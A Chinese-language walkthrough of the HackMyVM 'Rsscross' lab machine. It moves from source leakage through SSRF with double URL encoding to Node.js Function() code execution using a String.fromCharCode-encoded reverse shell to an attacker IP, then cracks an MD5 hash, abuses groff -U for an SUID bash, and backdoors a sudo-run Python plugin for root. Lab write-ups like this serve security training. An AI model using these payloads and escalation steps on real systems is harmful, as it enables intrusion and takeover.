HackMyVM-Rsscross

Sweet dreams are made of this
甜蜜的梦由此组成
Who am I to disagree?
我有何资格不附和
Travel the world and the seven seas
我环游世界和七大洋
Everybody’s looking for something
每个人皆有欲求

靶机ip：192.168.56.53

难度：高

涉及内容：

信息收集：目录爆破、敏感文件泄露（.tar 源码泄露）。

Web 漏洞利用：

双重 URL 编码绕过 Apache 解析拦截。
Server-Side Request Forgery (SSRF) 结合目录穿越。
Node.js 危险函数 Function() 导致的动态代码执行（RCE）。
利用 String.fromCharCode 绕过 HTML 实体转义 (htmlspecialchars) 及长度限制。

密码学与凭据收集：数据库配置审计、MD5 哈希爆破（识别 echo 默认追加换行符 \n 的实战陷阱）。

横向移动 (Lateral Movement)：利用 sudo 错误配置与 GTFOBins（groff -U 宏执行）提权至其他用户。

垂直提权 (Privilege Escalation)：

文件权限配置不当（利用属组的写权限 -rw-rw-r--）。
Python 模块劫持/插件注入（篡改 add_language.py）结合 sudo 提权至 Root。

端口扫描

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 192.168.56.53
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 23:10 -0400
Nmap scan report for 192.168.56.53 (192.168.56.53)
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
3000/tcp filtered ppp
MAC Address: 08:00:27:34:78:19 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.01 seconds

目录爆破

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# dirsearch -u 192.168.56.53 -e tar,gz,php,js,html,htm,zip,7z,001,bak
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                    
                                                                                                                                                           
Extensions: tar, gz, php, js, html, htm, zip, 7z, 001, bak | HTTP method: GET | Threads: 25 | Wordlist size: 14081

Output File: /home/kali/Desktop/reports/_192.168.56.53/_26-03-26_23-02-42.txt

Target: http://192.168.56.53/

[23:02:42] Starting:                                                                                                                                       
[23:02:43] 200 -    0B  - /html.php                                         
[23:02:43] 403 -  278B  - /.ht_wsr.txt                                      
[23:02:43] 403 -  278B  - /.htaccess.bak1                                   
[23:02:43] 403 -  278B  - /.htaccess.orig                                   
[23:02:43] 403 -  278B  - /.htaccess.sample
[23:02:43] 403 -  278B  - /.htaccess.save
[23:02:43] 403 -  278B  - /.htaccess_extra                                  
[23:02:43] 403 -  278B  - /.htaccess_orig                                   
[23:02:43] 403 -  278B  - /.htaccessBAK
[23:02:43] 403 -  278B  - /.htaccess_sc
[23:02:43] 403 -  278B  - /.htaccessOLD
[23:02:43] 403 -  278B  - /.htaccessOLD2
[23:02:43] 403 -  278B  - /.htm                                             
[23:02:43] 403 -  278B  - /.html
[23:02:43] 403 -  278B  - /.htpasswd_test                                   
[23:02:43] 403 -  278B  - /.htpasswds
[23:02:43] 403 -  278B  - /.httr-oauth
[23:02:44] 403 -  278B  - /.php                                             
[23:02:46] 301 -  314B  - /admin  ->  http://192.168.56.53/admin/           
[23:02:46] 302 -    0B  - /admin/  ->  article.manage.php                   
[23:02:46] 302 -    0B  - /admin/index.php  ->  article.manage.php          
[23:02:50] 200 -    6MB - /app.tar                                          
[23:02:52] 200 -    7B  - /config.php                                       
[23:03:04] 403 -  278B  - /server-status/                                   
[23:03:04] 403 -  278B  - /server-status
                                                                             
Task Completed

app.tar泄露了网站源码。

经过代码审计，主要突破点在以下几点。

node.js以及GetRss/index.php

const express = require('express');
const RSS = require('rss');
const request = require('request');
const app = express();

app.get("/api/:id",function(req, res, next) {
    var link = `http://localhost/Rssinfo/index.php/${req.params.id}`;
    var options = {
        'method': 'GET',
        'url': link,
        'headers': {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
        }
    };
    request(options, function (error, response, body) {
        if (error) throw new Error(error);
        try {
            const data = Function(
                body.match(/var passage = \{.*};/gm)[0]
                + 'let json_data=JSON.parse(JSON.stringify(passage));'
                + 'return json_data;'
            )();
            var feed = new RSS(data);
            var xml = feed.xml();
            res.contentType('application/xml');
            res.send(xml)
        }catch (e) {
            console.log(e);
            res.send('error');
        }
    })
})
app.listen(3000);

<?php
$pathParts = explode("/",$_SERVER['PHP_SELF']);
$id = htmlspecialchars(end($pathParts),ENT_QUOTES);
header("Content-type:application/xml;");
function getrss($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
}
echo getrss("http://localhost:3000/api/".$id);

后台未授权访问：/admin/ 目录下的 article.manage.php 和 article.add.php 没有任何身份校验，可以直接增删改文章。

过滤机制：后台对输入的参数使用了 htmlspecialchars(..., ENT_QUOTES) 进行全局转义，并且对 title 和 author 限制了最大长度 10 个字符，堵死了直接在此处进行传统 XSS 或代码注入的可能。但 content 字段没有长度限制。

SSRF 接口：前台 /GetRss/index.php/ 存在一个 SSRF 漏洞，它会将 URL 最后的路径作为 $id，拼接到 http://localhost:3000/api/ 后并使用 cURL 发起请求。

内部 Node.js 服务：3000 端口运行着一个 Express 服务，它会去请求本机的 Rssinfo/index.php/id，并通过正则表达式提取页面中的 var passage = {...}; 字符串，最后致命地使用了 Function()() 动态执行这段提取出的字符串。

目标是让 3000 端口的 Node.js 服务执行我们的恶意 Node.js 代码（反弹 Shell）。由于 /Rssinfo 页面的输出受限于 10 字符，我们需要让 Node.js 服务去请求前台的 /article.show.php（该页面会完整输出无长度限制的 content 字段）。

我们需要克服两个关键的拦截点：

拦截点 1 (Payload 语法被破坏)：PHP 的 htmlspecialchars 会将引号 "、' 转换为实体，导致 JS 语法报错。
- 绕过：使用 JS 的 String.fromCharCode() 将 Payload 转换为 ASCII 码，实现无引号的命令执行。
拦截点 2 (Apache 404 拦截)：如果直接通过 SSRF 访问 /..%2f..%2f 进行目录穿越，Apache 会在解析层将其还原为实际路径并报 404 错误，导致请求根本无法到达 PHP 脚本。
- 绕过：使用双重 URL 编码（Double URL Encoding），将 % 编码为 %25，即发送 %252f。

先准备好反弹的payload

1	`bash -c "bash -i >& /dev/tcp/192.168.56.104/4444 0>&1"`

转换为node.js形式

1	`global.process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/192.168.56.104/4444 0>&1"');`

使用 String.fromCharCode 进行 ASCII 编码绕过过滤，最终构造成符合 Node.js 正则匹配的格式：

var passage = {a:1}; global.process.mainModule.require(String.fromCharCode(99,104,105,108,100,95,112,114,111,99,101,115,115)).exec(String.fromCharCode(98,97,115,104,32,45,99,32,34,98,97,115,104,32,45,105,32,62,38,32,47,100,101,118,47,116,99,112,47,49,57,50,46,49,54,56,46,53,54,46,49,48,52,47,52,52,52,52,32,48,62,38,49,34)); //};

现在发表新文章构造payload

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl http://192.168.56.53/admin/article.modify.php?id=7
<!doctype html>
<html lang="zh-CN">
        <head>
                <meta charset="UTF-8" />
                <meta name="viewport" content="width=device-width, initial-scale=1.0">
                <title>修改文章 - RssCross 管理后台</title>
                <link rel="stylesheet" type="text/css" href="../commen.css"/>
        </head>
        <body>
                <div id="header">
                        <div id="head">
                                <div id="header_title">
                    📰 RssCross 管理后台
                                </div>
                                <ul id="menu">
                                        <li>
                                                <a href="../index.php">返回首页</a>
                                        </li>
                                </ul>
                        </div>
                </div>
                <div id="header_border"></div>

                <!--内容部分-->
                <div id="content_box">
                <div id="content">
                        <div id="left_bar">
                                <ul>
                                        <li><a href="article.add.php">➕ 新增文章</a></li>
                                        <li><a href="article.manage.php">📋 文章列表</a></li>
                                </ul>
                        </div>
                        <div id="right_content">
                                <span id="right_content_title">
                                        ✏️ 修改文章
                                </span>
                                <form action="article.modify.handle.php" method="post">
                                        <input type="hidden" name="id" value="7" />
                                        <table border="0" cellspacing="0" cellpadding="10px">
                                                <tr>
                                                        <td>标题</td>
                                                        <td><input type="text" name="title" id="title" value="hacker" required /></td>
                                                </tr>
                                                <tr>
                                                        <td>作者</td>
                                                        <td><input type="text" name="author" id="author" value="hacker" required /></td>
                                                </tr>
                                                <tr>
                                                        <td>描述</td>
                                                        <td><textarea name="description" rows="5" cols="20" required>var passage = {a:1}; global.process.mainModule.require(String.fromCharCode(99,104,105,108,100,95,112,114,111,99,101,115,115)).exec(String.fromCharCode(98,97,115,104,32,45,99,32,34,98,97,115,104,32,45,105,32,62,38,32,47,100,101,118,47,116,99,112,47,49,57,50,46,49,54,56,46,53,54,46,49,48,52,47,52,52,52,52,32,48,62,38,49,34)); //};</textarea></td>
                                                </tr>
                                                <tr>
                                                        <td>内容</td>
                                                        <td><textarea name="content" rows="10" cols="20" required>var passage = {a:1}; global.process.mainModule.require(String.fromCharCode(99,104,105,108,100,95,112,114,111,99,101,115,115)).exec(String.fromCharCode(98,97,115,104,32,45,99,32,34,98,97,115,104,32,45,105,32,62,38,32,47,100,101,118,47,116,99,112,47,49,57,50,46,49,54,56,46,53,54,46,49,48,52,47,52,52,52,52,32,48,62,38,49,34)); //};</textarea></td>
                                                </tr>
                                        </table>
                                        <input type="submit" value="💾 保存修改"/>
                                </form>
                        </div>
                </div>
                </div>
                <div id="footer">
                        <p>&copy; 2024 RssCross. All rights reserved.</p>
                </div>
        </body>
</html>

本地开启监听4444端口准备触发

1	`curl http://192.168.56.53/GetRss/index.php/..%252f..%252farticle.show.php%253fid=7`

触发请求后，Apache 将解码后的 %2f 传递给 PHP，PHP 通过 cURL 请求内部的 3000 端口。Node.js 接收到 http://localhost/article.show.php?id=7 的响应，正则提取出我们伪造的无引号 JS 代码并放入 Function() 中执行。

此时，攻击机的 Netcat 成功接收到反弹回来的 Shell，获取服务器权限。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.21.128 • 192.168.56.104 • 192.168.10.150 • 172.17.0.1 • 172.18.0.1
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from RssCross-192.168.56.53-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/RssCross~192.168.56.53_Linux_x86_64/2026_03_26-22_33_25-099.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
www-data@RssCross:/app$ ls
app.js  node_modules  package.json  package-lock.json
www-data@RssCross:/app$ cd /home
www-data@RssCross:/home$ ls
mob  zb
www-data@RssCross:/home$ cd zb/
www-data@RssCross:/home/zb$ ls
user.txt
www-data@RssCross:/home/zb$ cat user.txt

之前的connect.php有泄露mysql的用户名和密码，连上去可以得到一串哈希。

1	`mysql -u ctf -p'98vwqld912!@823c@#'`

MariaDB [flag]> show databases;
+--------------------+
| Database           |
+--------------------+
| article            |
| flag               |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
5 rows in set (0.001 sec)
Database changed
MariaDB [flag]> show tables;
+----------------+
| Tables_in_flag |
+----------------+
| echo           |
+----------------+
1 row in set (0.000 sec)

MariaDB [flag]> select * from echo;
+----------------------------------+
| try                              |
+----------------------------------+
| 07e2a8ac8bd28bc3a0ffc4fab3145b5b |
+----------------------------------+
1 row in set (0.000 sec)

这里也是比较坑人的，问了提示才知道因为echo password | md5sum没有加-n参数，导致正常的john和hashcat是跑不出来的，魔鬼藏在细节中。

（之前就被这种小细节坑过，还不长记性）

用下面的脚本爆破出密码。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat exp.py  
import hashlib
import sys

target_hash = "07e2a8ac8bd28bc3a0ffc4fab3145b5b"
wordlist = "rockyou.txt"

print(f"[*] 开始执行爆破...")
print(f"[*] 目标 Hash : {target_hash}")
print(f"[*] 字典文件  : {wordlist}")
print("-" * 40)

try:
    # 忽略解码错误，防止字典里有乱码导致脚本崩溃
    with open(wordlist, "r", encoding="utf-8", errors="ignore") as f:
        for line in f:
            # 清理字典自带的换行和回车符，拿到纯净的单词
            word = line.strip('\r\n')
            
            # 1. 模拟 `echo -n` (不带换行符)
            hash_no_newline = hashlib.md5(word.encode()).hexdigest()
            
            # 2. 模拟 `echo` (带换行符 '\n')
            hash_with_newline = hashlib.md5((word + '\n').encode()).hexdigest()

            # 对比目标 Hash
            if hash_no_newline == target_hash:
                print(f"\n[+] 🎉 爆破成功 (无换行 / echo -n)!")
                print(f"[+] 密码明文 : {word}")
                sys.exit(0)
                
            if hash_with_newline == target_hash:
                print(f"\n[+] 🎉 爆破成功 (带换行 / 默认 echo)!")
                print(f"[+] 密码明文 : {word}")
                print(f"[!] 提示: 在输入密码时，千万别把换行输进去，就输 [{word}]")
                sys.exit(0)

    print("\n[-] 字典跑完了，没有找到匹配的密码。")

except FileNotFoundError:
    print(f"\n[-] 错误: 找不到字典文件 {wordlist}，请确认它在当前目录下。")
except KeyboardInterrupt:
    print("\n[-] 用户提前终止了爆破。")

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# python3 exp.py
[*] 开始执行爆破...
[*] 目标 Hash : 07e2a8ac8bd28bc3a0ffc4fab3145b5b
[*] 字典文件  : rockyou.txt
----------------------------------------

[+] 🎉 爆破成功 (带换行 / 默认 echo)!
[+] 密码明文 : zombie666
[!] 提示: 在输入密码时，千万别把换行输进去，就输 [zombie666]

也是成功爆破出了密码。

zb@RssCross:/app$ sudo -l
Matching Defaults entries for zb on RssCross:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zb may run the following commands on RssCross:
    (mob) NOPASSWD: /usr/bin/groff
zb@RssCross:/app$

之前到处扒拉的时候四处查找，看zb组所属的文件，发现了这个东西。

zb@RssCross:/app$ find / -group zb -type f 2>/dev/null
/run/user/1000/systemd/inaccessible/reg
/usr/local/lib/python3.9/dist-packages/smassh/src/plugins/add_language.py
/home/zb/.bash_logout
/home/zb/.bashrc
/home/zb/.profile
/home/zb/.viminfo

目前有两条线索，一个是可以以mob的身份执行groff，一个是zb也就是我们可以修改这个python文件。

先遵循第一条线索，groff是个Linux 系统自带的一个非常古老的文本排版和格式化工具。

groff -U（不安全模式）允许执行内置的 .sy 系统调用宏，我们可以利用它复制 bash 并赋予 SUID 权限。

zb@RssCross:/app$ cat <<EOF > /tmp/exploit.roff
> .sy cp /bin/bash /tmp/mob_bash
> .sy chmod +s /tmp/mob_bash
> EOF
zb@RssCross:/app$ cd /tmp
zb@RssCross:/tmp$ ls
exploit.roff                                                             systemd-private-0d74693ffc5647db8b20cae9f50bab04-systemd-logind.service-rmWnqf
systemd-private-0d74693ffc5647db8b20cae9f50bab04-apache2.service-T2Ndui  systemd-private-0d74693ffc5647db8b20cae9f50bab04-systemd-timesyncd.service-lPYBBg
zb@RssCross:/tmp$ sudo -u mob /usr/bin/groff -U /tmp/exploit.roff
zb@RssCross:/tmp$ ls -al
total 1188
drwxrwxrwt 10 root root    4096 Mar 27 06:25 .
drwxr-xr-x 19 root root    4096 Dec  3 10:59 ..
-rw-r--r--  1 zb   zb        58 Mar 27 06:25 exploit.roff
drwxrwxrwt  2 root root    4096 Mar 27 06:11 .font-unix
drwxrwxrwt  2 root root    4096 Mar 27 06:11 .ICE-unix
-rwsr-sr-x  1 mob  mob  1168776 Mar 27 06:25 mob_bash
drwx------  3 root root    4096 Mar 27 06:11 systemd-private-0d74693ffc5647db8b20cae9f50bab04-apache2.service-T2Ndui
drwx------  3 root root    4096 Mar 27 06:11 systemd-private-0d74693ffc5647db8b20cae9f50bab04-systemd-logind.service-rmWnqf
drwx------  3 root root    4096 Mar 27 06:11 systemd-private-0d74693ffc5647db8b20cae9f50bab04-systemd-timesyncd.service-lPYBBg
drwxrwxrwt  2 root root    4096 Mar 27 06:11 .Test-unix
drwxrwxrwt  2 root root    4096 Mar 27 06:11 .X11-unix
drwxrwxrwt  2 root root    4096 Mar 27 06:11 .XIM-unix
zb@RssCross:/tmp$

我们可以这样来获得权限

zb@RssCross:/tmp$ ./mob_bash -p
mob_bash-5.0$ id
uid=1000(zb) gid=1000(zb) euid=1001(mob) egid=1001(mob) groups=1001(mob),1000(zb)
mob_bash-5.0$

写公钥进去稳定权限

┌──(root㉿kaada)-[~/.ssh]
└─# ssh mob@192.168.56.53
The authenticity of host '192.168.56.53 (192.168.56.53)' can't be established.
ED25519 key fingerprint is: SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:9: [hashed name]
    ~/.ssh/known_hosts:10: [hashed name]
    ~/.ssh/known_hosts:15: [hashed name]
    ~/.ssh/known_hosts:16: [hashed name]
    ~/.ssh/known_hosts:17: [hashed name]
    ~/.ssh/known_hosts:18: [hashed name]
    ~/.ssh/known_hosts:20: [hashed name]
    ~/.ssh/known_hosts:27: [hashed name]
    (31 additional names omitted)
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.53' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Linux RssCross 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
mob@RssCross:~$ sudo -l
Matching Defaults entries for mob on RssCross:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mob may run the following commands on RssCross:
    (ALL) NOPASSWD: /usr/local/bin/smassh

这里就柳暗花明了，zb用户可以朝插件写入后门，先提前写好后门，而我们要做的就是以mob用户的身份去执行

1	`mob_bash-5.0$ echo 'import os; os.system("chmod u+s /bin/bash")' >> /usr/local/lib/python3.9/dist-packages/smassh/src/plugins/add_language.py`

mob@RssCross:~$ smassh --help
Usage: smassh [OPTIONS] COMMAND [ARGS]...

Options:
  -v, --version  Show version and exit.
  -h, --help     Show this message and exit.

Commands:
  add  Add a language to smassh
mob@RssCross:~$ sudo /usr/local/bin/smassh add hacker
=> Checking if language pack exists...
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connection.py", line 198, in _new_conn
    sock = connection.create_connection(
  File "/usr/local/lib/python3.9/dist-packages/urllib3/util/connection.py", line 60, in create_connection
    for res in socket.getaddrinfo(host, port, family, socket.SOCK_STREAM):
  File "/usr/lib/python3.9/socket.py", line 953, in getaddrinfo
    for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
socket.gaierror: [Errno -3] Temporary failure in name resolution

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 787, in urlopen
    response = self._make_request(
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 488, in _make_request
    raise new_e
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 464, in _make_request
    self._validate_conn(conn)
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 1093, in _validate_conn
    conn.connect()
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connection.py", line 753, in connect
    self.sock = sock = self._new_conn()
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connection.py", line 205, in _new_conn
    raise NameResolutionError(self.host, self, e) from e
urllib3.exceptions.NameResolutionError: <urllib3.connection.HTTPSConnection object at 0x7f0e7dafe790>: Failed to resolve 'raw.githubusercontent.com' ([Errno -3] Temporary failure in name resolution)

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/requests/adapters.py", line 644, in send
    resp = conn.urlopen(
  File "/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py", line 841, in urlopen
    retries = retries.increment(
  File "/usr/local/lib/python3.9/dist-packages/urllib3/util/retry.py", line 519, in increment
    raise MaxRetryError(_pool, url, reason) from reason  # type: ignore[arg-type]
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='raw.githubusercontent.com', port=443): Max retries exceeded with url: /monkeytypegame/monkeytype/master/frontend/static/languages/hacker.json (Caused by NameResolutionError("<urllib3.connection.HTTPSConnection object at 0x7f0e7dafe790>: Failed to resolve 'raw.githubusercontent.com' ([Errno -3] Temporary failure in name resolution)"))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/bin/smassh", line 8, in <module>
    sys.exit(main())
  File "/usr/local/lib/python3.9/dist-packages/click/core.py", line 1161, in __call__
    return self.main(*args, **kwargs)
  File "/usr/local/lib/python3.9/dist-packages/click/core.py", line 1082, in main
    rv = self.invoke(ctx)
  File "/usr/local/lib/python3.9/dist-packages/click/core.py", line 1697, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
  File "/usr/local/lib/python3.9/dist-packages/click/core.py", line 1443, in invoke
    return ctx.invoke(self.callback, **ctx.params)
  File "/usr/local/lib/python3.9/dist-packages/click/core.py", line 788, in invoke
    return __callback(*args, **kwargs)
  File "/usr/local/lib/python3.9/dist-packages/smassh/__main__.py", line 32, in add
    AddLanguage().add(name)
  File "/usr/local/lib/python3.9/dist-packages/smassh/src/plugins/add_language.py", line 38, in add
    pack = self.get_pack(name)
  File "/usr/local/lib/python3.9/dist-packages/smassh/src/plugins/add_language.py", line 26, in get_pack
    req = requests.get(uri)
  File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 73, in get
    return request("get", url, params=params, **kwargs)
  File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 59, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 589, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 703, in send
    r = adapter.send(request, **kwargs)
  File "/usr/local/lib/python3.9/dist-packages/requests/adapters.py", line 677, in send
    raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='raw.githubusercontent.com', port=443): Max retries exceeded with url: /monkeytypegame/monkeytype/master/frontend/static/languages/hacker.json (Caused by NameResolutionError("<urllib3.connection.HTTPSConnection object at 0x7f0e7dafe790>: Failed to resolve 'raw.githubusercontent.com' ([Errno -3] Temporary failure in name resolution)"))
mob@RssCross:~$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash
mob@RssCross:~$

#HVM

HackMyVM-Rsscross

http://example.com/2026/03/27/HackMyVM-Rsscross/

Author

Skyarrow

Posted on

March 27, 2026

Licensed under

HackTheBox-Pirate Next